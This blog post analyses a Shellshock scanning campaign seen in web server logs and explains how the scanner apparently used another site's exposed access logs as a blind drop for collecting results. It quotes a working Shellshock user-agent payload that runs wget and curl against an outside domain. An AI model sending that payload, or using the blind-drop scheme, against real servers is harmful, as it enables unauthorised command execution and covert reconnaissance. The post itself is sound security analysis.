Indirect shellshock security scanning via other people's logfiles

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

24.71.248.218 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget http://closettransfer.com/IPTRANSITTEST -O /dev/null;wget1 http://closettransfer.com/IPTRANSITTEST -O /dev/null;curl http://closettransfer.com/IPTRANSITTEST -o /dev/null;/usr/sfwbin/wget http://closettransfer.com/IPTRANSITTEST;fetch -/dev/null http://closettransfer.com/IPTRANSITTEST'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised and I should try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26--  http://closettransfer.com/IPTRANSITTEST 
Resolving closettransfer.com (closettransfer.com)... 98.138.19.143
Connecting to closettransfer.com (closettransfer.com)|98.138.19.143|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2016-04-30 13:38:26 ERROR 404: Not Found.


They weren't sending a malicious payload - and the scanning had sent the results to /dev/null anyway.  Googling IPTRANSITTEST turned up a few hits in other people's logfiles... wait a second.  Logfiles.  What if closettransfer.com had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?

My first guess proved startlingly lucky:
Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn't dig further.

It's pretty clear, though, what happened:  These logfiles are easily found via a bit of "Google-scanning":
Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent.  By using the drop-box, these nodes never need to contact the controller / response collector:  they're completely fire-and-forget, and thus, could be distributed as malware or in a host of other ways.  At some point, the controller wants to get the entries.  He/she then can just download the raw access files using Tor, finding all sorts of juicy entries like:


XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" "closettransfer.com"

Clever.

Popular posts from this blog

22 Months of Voice-Based Assistants

Stealing Google's Coding Practices for Academia

Reflecting on CS Graduate Admissions